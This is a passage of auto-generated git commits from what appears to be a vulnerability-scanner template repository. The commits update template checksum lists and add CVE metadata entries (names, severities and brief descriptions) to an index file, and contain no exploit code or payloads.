-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7056,7 +7056,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:67df4231cf65298100e3464428cfa50e72151f2a +templates-checksum.txt:b30d65182e77ce3e2a3de6af798242f83cc6424f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ec9b072a4e1ccb7ead860cfe98b39040cc2dd60a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 16:59:19 +0000 Subject: [PATCH 0269/1090] Auto Generated New Template Addition List [Sun Sep 10 16:59:19 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96939e4090..a6b27055ac 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml http/cves/2023/CVE-2023-38433.yaml http/cves/2023/CVE-2023-39361.yaml +http/cves/2023/CVE-2023-39600.yaml http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/dxplanning-panel.yaml From 9c223977e853c5a50273db7002a0034f7dd08ce5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 16:59:21 +0000 Subject: [PATCH 0270/1090] Auto Generated cves.json [Sun Sep 10 16:59:21 UTC 2023] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 811f5dd13e..054cc2fdc6 100644 --- a/cves.json +++ b/cves.json @@ -2004,6 +2004,7 @@ {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} +{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} @@ -2011,6 +2012,7 @@ {"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} {"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} {"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"} +{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 134236ed42..b2da667d54 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d2b00d4103194de5082d992374a6e148 +d3d61b5b23048ba01c949efdf8b4fe02 From 62c12eb9ab701e20087b3eb177300c116562f928 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 16:59:32 +0000 Subject: [PATCH 0271/1090] Auto Generated Templates Checksum [Sun Sep 10 16:59:32 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4e42d38388..497e808658 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1601,7 +1601,7 @@ http/cves/2020/CVE-2020-8193.yaml:a33e347adac168aba278e8f39387cbfcc0ac28bf http/cves/2020/CVE-2020-8194.yaml:9d5782d926f42590cef555b0b6c0a3952352ac97 http/cves/2020/CVE-2020-8209.yaml:09d7cb23deb28cf0157931f4209353b7c5d18d88 http/cves/2020/CVE-2020-8497.yaml:afd8fae6136c2682306f05af49e17cc6c8ea2bce -http/cves/2020/CVE-2020-8512.yaml:c9fdce53f409dc102a08fe6863145f873da805a7 +http/cves/2020/CVE-2020-8512.yaml:43854c804933f0a2e2163900227ef76ebef48974 http/cves/2020/CVE-2020-8515.yaml:48e199b52e82f133f5c4fa33e92422672dbdaf2a http/cves/2020/CVE-2020-8641.yaml:90fcfc97976c92de25d573ea752b46efa989fea3 http/cves/2020/CVE-2020-8644.yaml:74a82687fabe26e8c2a68333c1fb2d1927d77ff5 @@ -2634,6 +2634,7 @@ http/cves/2023/CVE-2023-39141.yaml:ddb042a08cb413a97f662fbc0aa107a5d4a5574a http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6 +http/cves/2023/CVE-2023-39600.yaml:c326d0e518d5a41c899dbf0a15c6d4e28f00b705 http/cves/2023/CVE-2023-4173.yaml:add4098ac7435ecc0fc9c55e00232d441b522a1f http/cves/2023/CVE-2023-4174.yaml:1902cb27adf5853b7f3cd5312963e6dddfb2a298 http/cves/2023/CVE-2023-4634.yaml:52424e8bdbd08b6d9cea82d086b21ca1b9e109ee @@ -7056,7 +7057,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:b30d65182e77ce3e2a3de6af798242f83cc6424f +templates-checksum.txt:52aec48817e5c75e55036e918047bcc7db427e7b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c 